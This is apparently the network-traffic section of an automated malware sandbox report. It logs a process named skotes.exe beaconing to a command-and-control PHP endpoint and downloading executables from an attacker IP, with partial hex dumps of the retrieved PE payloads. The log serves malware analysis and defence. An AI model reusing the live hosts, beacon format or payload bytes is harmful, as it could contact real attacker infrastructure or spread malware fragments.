                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 23:57:32 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675f6cec-1c0600"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 4e e0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELdTg*j@jN@M$a$$ $h@.rsrc$x@.idata $z@ `+$|@skauaiwmp Pb~@npkvhzbcj@.taggant0j"@
                                                                                                                                                                                              Dec 16, 2024 01:02:23.060719967 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:23.060739040 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:23.060976982 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:23.060995102 CET1236INData Raw: 15 0d b1 dd 57 d5 d6 3a 18 e2 95 e1 05 8a f2 1a d3 b6 2e 41 57 92 e7 50 ff 8a b6 00 f3 16 1e 4c c7 54 26 63 d7 3c 0e 1b 12 e0 fb 9e 38 6c f0 6c 2f 6a fe 60 2b fa ee 2c 03 8a 5a 8a bd 9b 66 7a 13 8e 52 89 eb 18 1e 61 16 c2 ea 08 fb aa 2e 62 d9 6b
                                                                                                                                                                                              Data Ascii: W:.AWPLT&c<8ll/j`+,ZfzRa.bkUXrq`tb=,1[.Z+jh<o3GW]RU.ROB^+Z^Y0VL)DJ-CS6mt[:z7zQ:En'(g
                                                                                                                                                                                              Dec 16, 2024 01:02:23.061012983 CET1236INData Raw: c9 72 f0 a4 f4 7a 1a 3a 14 8b ab 0e 7f bf 79 d2 28 b2 72 aa c5 6a 43 52 9e 79 53 b5 c4 9a df 72 6a f4 2d b0 db f9 8f 11 3a dd 56 e3 8f e1 2e 1d 02 1d 2d cc bc c1 d3 11 de 35 28 5b 26 8c 00 d4 9b e3 f1 c0 5b 09 2e 00 23 fb f0 eb 03 ea 2e de 44 99
                                                                                                                                                                                              Data Ascii: rz:y(rjCRySrj-:V.-5([&[.#.DY_$0Z"_:`wN_g5>T*6B.R~jG%3%YQh\'=?q0I+@tC?%`{:"Ws8 @R@^3Qe,A 6aD/ssn
                                                                                                                                                                                              Dec 16, 2024 01:02:23.061033010 CET1236INData Raw: 15 e5 26 dd c9 12 55 c9 5b a4 28 6a c4 b3 75 5b c9 36 45 e1 14 03 9f 66 05 d4 de 6a 97 8a 52 b9 0b 74 39 bf 9c e2 86 6f 8f 16 54 61 5f d7 6a 22 e1 70 a8 62 db b2 c2 4d 24 a6 e3 66 b5 56 3e 39 1d aa 40 6d 6f 03 4f e6 c9 4c fe 40 c9 a2 06 dd ff 0b
                                                                                                                                                                                              Data Ascii: &U[(ju[6EfjRt9oTa_j"pbM$fV>9@moOL@z^)c&Tz&F)`Qi.TXZ9J/zbnVj@$.WN.jEsm9tfQ7:jA@:;a8j".1tmo*m5[:CWjM
                                                                                                                                                                                              Dec 16, 2024 01:02:23.061413050 CET1236INData Raw: db bd 40 46 75 ae 8e d5 5c 39 2e 65 76 19 8a 13 03 a8 46 fd 5a 23 eb 5d dc 02 2f 6f 53 d7 16 51 41 fd d5 e0 c3 a3 f6 61 77 16 f4 6c fc f4 25 6d 6b a8 55 95 db 9a ab e9 1f 26 0d 31 b3 a8 f4 84 c4 42 a9 32 e9 dd 2e 61 00 1f 4e fb 02 e6 25 39 77 d4
                                                                                                                                                                                              Data Ascii: @Fu\9.evFZ#]/oSQAawl%mkU&1B2.aN%9wA),-\Eil5{,Ik]WCd2ogz]17Jn\-IzoQeJ@{G=:V{@V<&S>RS"@iO$J{:Ed1x;
                                                                                                                                                                                              Dec 16, 2024 01:02:23.061445951 CET1224INData Raw: b7 8b 75 d7 c5 e7 45 6d 17 30 32 6f c3 be f2 b4 5b ca 57 13 8a 8a 4e 45 47 c6 40 3a 77 a7 4d e0 5d d2 40 69 03 16 7e d6 1b a5 ed 5d 27 f2 39 6f 74 8a 3a d3 5d 7f 2c e0 9c 17 07 09 dd 9b 1e 24 73 9b f1 7c c5 1f b6 de c9 0a ee 37 5f 26 68 6f 5b 22
                                                                                                                                                                                              Data Ascii: uEm02o[WNEG@:wM]@i~]'9ot:],$s|7_&ho["$k2@W43@V_5%]TMW>9vC=@"N7@kEj1)X>xLj3NhR+3@RtFW@^RCV.
                                                                                                                                                                                              Dec 16, 2024 01:02:23.061464071 CET1236INData Raw: 1f a8 46 f9 5c f6 f4 68 cf 25 2c a6 27 a8 46 dd 57 7e ab 1e d9 94 cf 07 fb 26 3d 1b 4f a3 1a d3 c5 6f 35 4b e1 36 b2 6f 63 b4 9e db 02 69 35 e2 9f 3e f5 69 33 0f 32 df ea a7 40 71 94 93 64 19 87 16 4a a5 f5 e6 b1 1b 7e b4 40 7d c4 6e 2e 71 74 d4
                                                                                                                                                                                              Data Ascii: F\h%,'FW~&=Oo5K6oci5>i32@qdJ~@}n.qtQ"f'j=5Q_;]JTW\<Sot(!P72@a\85BmO^N1g'zE!oDQTm`QLVS~
                                                                                                                                                                                              Dec 16, 2024 01:02:23.180713892 CET1236INData Raw: d1 a3 2a 91 57 d6 fe 0a 5a a6 53 77 f3 8c 10 b0 c1 db 3b 21 cf 64 a8 2c 1d da ae 16 04 46 ea 66 ff e8 7f 77 5d b0 37 9d 48 c8 54 2d e0 a1 42 2f 60 70 55 58 18 08 66 47 c1 68 e7 76 c4 83 56 93 0b a0 12 a9 03 28 55 3d c8 17 3a d1 ef 76 e2 2b 61 d3
                                                                                                                                                                                              Data Ascii: *WZSw;!d,Ffw]7HT-B/`pUXfGhvV(U=:v+an9gQ);O`;h2}F&iCQ7y>bCR8|>]?u+jRp1n+XWQuP>5Ta+q0T:X.N


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              21192.168.2.449977185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:02:30.391417027 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 35 38 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                              Data Ascii: d1=1015827001&unit=246122658369
                                                                                                                                                                                              Dec 16, 2024 01:02:31.553380013 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:31 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              22192.168.2.449982185.215.113.16808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:02:32.768012047 CET55OUTGET /well/random.exe HTTP/1.1
                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                              Dec 16, 2024 01:02:33.940402031 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:33 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 967168
                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 23:55:31 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675f6c73-ec200"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 64 6c 5f 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 12 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELdl_g"w@ Zo@@@d|@Vu4@.text `.rdata@@.datalpH@.rsrcV@X@@.relocuvL@B
                                                                                                                                                                                              Dec 16, 2024 01:02:33.940428019 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00
                                                                                                                                                                                              Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQ
                                                                                                                                                                                              Dec 16, 2024 01:02:33.940735102 CET1236INData Raw: e8 a9 00 00 00 68 02 24 44 00 e8 4f f0 01 00 59 c3 a1 30 14 4d 00 51 8b 40 04 05 30 14 4d 00 50 e8 e3 23 00 00 68 17 24 44 00 e8 2f f0 01 00 59 c3 e8 de 25 00 00 68 1c 24 44 00 e8 1e f0 01 00 59 c3 e8 ae e7 01 00 68 21 24 44 00 e8 0d f0 01 00 59
                                                                                                                                                                                              Data Ascii: h$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY^U80MtI3M0IMMVQfMo0M@0M\
                                                                                                                                                                                              Dec 16, 2024 01:02:33.940763950 CET1236INData Raw: 8b 4f c4 85 c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d 8f 8c fd ff ff e8 1b 02 00 00 8d 8f 7c fd ff ff e8 23 83 00
                                                                                                                                                                                              Data Ascii: OO_`d<IvY|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY9404
                                                                                                                                                                                              Dec 16, 2024 01:02:33.940785885 CET448INData Raw: 00 8b ce e8 ab b5 00 00 6a 40 56 e8 d0 e3 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 53 8b d9 56 57 80 7b 0d 00 8b 7b 08 75 29 8b 45 08 8b cf 8b 30 e8 7e b5 00 00 89 37 c7 47 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00
                                                                                                                                                                                              Data Ascii: j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]
                                                                                                                                                                                              Dec 16, 2024 01:02:33.940995932 CET1236INData Raw: 5e c3 6a 10 8d 41 04 5a 83 20 00 8d 40 08 83 ea 01 75 f5 8b c1 c3 53 56 8b 35 98 c6 49 00 33 db 57 8b f9 6a 05 58 53 89 07 89 47 04 66 c7 47 08 01 00 89 5f 10 89 5f 14 89 5f 18 89 5f 1c 6a 5b c7 47 0c 04 00 00 00 ff d6 53 6a 10 88 47 29 ff d6 53
                                                                                                                                                                                              Data Ascii: ^jAZ @uSV5I3WjXSGfG____j[GSjG)ShG&ShG'SjG(SjG$G%_^[UQW3EWPWh }IEjWWh %MI_U=Mt_E%\M%PMXMtIhFM2j3YY
                                                                                                                                                                                              Dec 16, 2024 01:02:33.941016912 CET1236INData Raw: 05 83 fe 2b 75 c7 83 fe 2b 0f 94 c3 33 c0 83 fe 2b 0f 94 c0 8d 04 85 04 00 00 00 8b 0c 08 66 83 79 08 34 0f 85 1b 07 04 00 8b 09 83 ec 10 8b 41 04 8b 11 89 45 ec 8b 41 08 89 45 f0 8b 41 0c 8b cc 52 89 55 e8 89 45 f4 ff 00 e8 e3 7b 00 00 b9 6c 15
                                                                                                                                                                                              Data Ascii: +u+3+fy4AEAEARUE{lMG3+DfxGuBAEESPEPEPWDMnwU%lMc3_^[jiXlU<SVMMW}3E7Nuu3R
                                                                                                                                                                                              Dec 16, 2024 01:02:33.941036940 CET1236INData Raw: 80 bd 5d ff ff ff 00 8b 45 bc 0f 85 96 02 04 00 8b 18 8d 8d 54 ff ff ff e8 70 02 00 00 8b 85 58 ff ff ff 89 45 bc 8b 45 f4 85 c0 0f 88 92 04 04 00 3b fb 0f 84 31 fd ff ff e9 85 04 04 00 ff 75 e8 ff 75 f4 ff 75 e4 ff 75 e0 53 52 ff 75 f0 33 db 53
                                                                                                                                                                                              Data Ascii: ]ETpXEE;1uuuuSRu3SxMxl`MTM_^[rU]AjYf9H}AjY
                                                                                                                                                                                              Dec 16, 2024 01:02:33.941056967 CET1236INData Raw: 8b 4d f4 89 4c b8 04 eb d6 55 8b ec 83 e4 f8 b8 2c 00 02 00 e8 0e f5 03 00 53 56 57 8d 4c 24 28 e8 13 7f 00 00 8d 44 24 38 33 db 50 68 ff 7f 00 00 88 5c 24 19 88 5c 24 1a ff 15 28 c3 49 00 8d 44 24 13 50 ff 75 08 e8 c2 03 00 00 ff 15 18 c2 49 00
                                                                                                                                                                                              Data Ascii: MLU,SVWL$(D$83Ph\$\$(ID$PuIM3#MG;D$PQhMhM,#MM#MD$D$P$<Ph5MhIt$MY@\$5MhMa|
                                                                                                                                                                                              Dec 16, 2024 01:02:33.941076994 CET328INData Raw: 45 e0 00 01 00 00 89 5d e8 c7 45 ec 01 00 00 00 e8 a1 6d 00 00 53 53 8d 45 e0 50 8d 45 d0 50 e8 fa 78 00 00 8d 4d d0 89 45 0c e8 63 69 00 00 8d 4d e0 e8 6c a0 00 00 8b 75 ac 8d 4d f0 e8 22 7a 00 00 8d 45 f0 50 8d 4d 90 e8 39 01 00 00 8b 7d f0 57
                                                                                                                                                                                              Data Ascii: E]EmSSEPEPxMEciMluM"zEPM9}WhXIYYWh0IYYWhIYYWhIYYu>M8]uMEPMEMPxEPM9M
                                                                                                                                                                                              Dec 16, 2024 01:02:34.060867071 CET1236INData Raw: e8 66 40 00 00 83 c4 10 8d 4d d0 e8 4b 9f 00 00 8d 45 f0 50 8d 4d 90 e8 23 00 00 00 3b de 7c cb 8d 4d f0 e8 22 68 00 00 8d 4d c0 e8 2b 9f 00 00 8d 4d 90 e8 40 00 00 00 5f 5e 5b c9 c2 08 00 55 8b ec 8b 11 3b 51 1c 7d 1e 8d 42 01 89 01 8b 41 18 8b
                                                                                                                                                                                              Data Ascii: f@MKEPM#;|M"hM+M@_^[U;Q}BAM;t4!x]MhI:2VWw7'G$4I7v-YO_^gU=hMtP3hPhMTPMLH


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              23192.168.2.449996185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:02:39.907680035 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 35 38 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                              Data Ascii: d1=1015828001&unit=246122658369
                                                                                                                                                                                              Dec 16, 2024 01:02:40.869878054 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:40 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              24192.168.2.450002185.215.113.16808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:02:43.370198011 CET54OUTGET /off/random.exe HTTP/1.1
                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                              Dec 16, 2024 01:02:44.118172884 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:43 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 2779136
                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 23:55:59 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675f6c8f-2a6800"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 eb 67 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ +g+`Ui` @ @.rsrc`2@.idata 8@nprvplua **:@btyxknlq *B*@.taggant@*"F*@
                                                                                                                                                                                              Dec 16, 2024 01:02:44.118211985 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:44.118231058 CET448INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:44.118247986 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:44.118278027 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:44.118294954 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:44.118314981 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:44.118697882 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:44.118722916 CET1236INData Raw: eb 31 80 8f aa c3 af 6e 26 cc cf 7f be d3 b8 06 23 ba d3 e7 3c 78 21 6b e4 5d f6 96 6b d8 21 c3 e3 49 e8 e0 45 a4 a3 59 f3 d4 da e2 9a f0 30 2f 0d bb f2 c8 35 42 9b 61 22 19 89 20 e6 f7 9c 27 25 a6 57 ad 98 3a f4 8e 65 ca 9b b8 01 dc 85 e3 33 08
                                                                                                                                                                                              Data Ascii: 1n&#<x!k]k!IEY0/5Ba" '%W:e3# >f.<[ 6`.,`#Um@ ?Xe0!Kb>JeJ(:bXq(6]o|_-dy
                                                                                                                                                                                              Dec 16, 2024 01:02:44.118746042 CET1236INData Raw: 68 1d c2 4a 6d 09 86 d9 a3 cd d3 a0 69 ea 74 22 fa 16 ce 40 a9 08 f9 60 58 3b ab 0d 0a 09 6f e9 a2 d1 a9 22 b5 0b 50 e3 5a 04 1d 2a 62 fd 52 1e e9 d4 de 2c df aa b5 ca 69 5a 9d b6 70 6d 2f 24 6b 5f 9f 7d ad f2 c9 29 ef c6 d7 88 84 6a 32 7e 2a 57
                                                                                                                                                                                              Data Ascii: hJmit"@`X;o"PZ*bR,iZpm/$k_})j2~*WA~Kjr|.Lwa7/h^+!D#Nn<)rOT|Y0<NBhj u1Pvg1`y$A18x,^k,{/W2
                                                                                                                                                                                              Dec 16, 2024 01:02:44.238785028 CET1236INData Raw: 61 d5 e6 66 36 0b f2 e4 63 57 68 23 2e 0c 57 2b 8b cb 21 94 85 c1 70 0a 41 71 15 f5 6e 29 f3 af a1 18 36 ff 26 43 2d 22 28 24 21 2b 21 13 d6 4b 91 15 1a 20 57 fd 35 2f aa 85 b0 89 a9 f4 1c 10 44 de 9a 52 8a c0 24 3c b4 1a 96 3f 55 94 a2 4a 93 21
                                                                                                                                                                                              Data Ascii: af6cWh#.W+!pAqn)6&C-"($!+!K W5/DR$<?UJ!8A[/_@%aug8vT'qiM=#K>=+-<`ISOO9MgG$6kCDK4j+^g`IMpl;TM4]nAuMt!bNp@


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              25192.168.2.450028185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:02:54.995510101 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 35 38 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                              Data Ascii: d1=1015829001&unit=246122658369
                                                                                                                                                                                              Dec 16, 2024 01:02:56.138806105 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:55 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
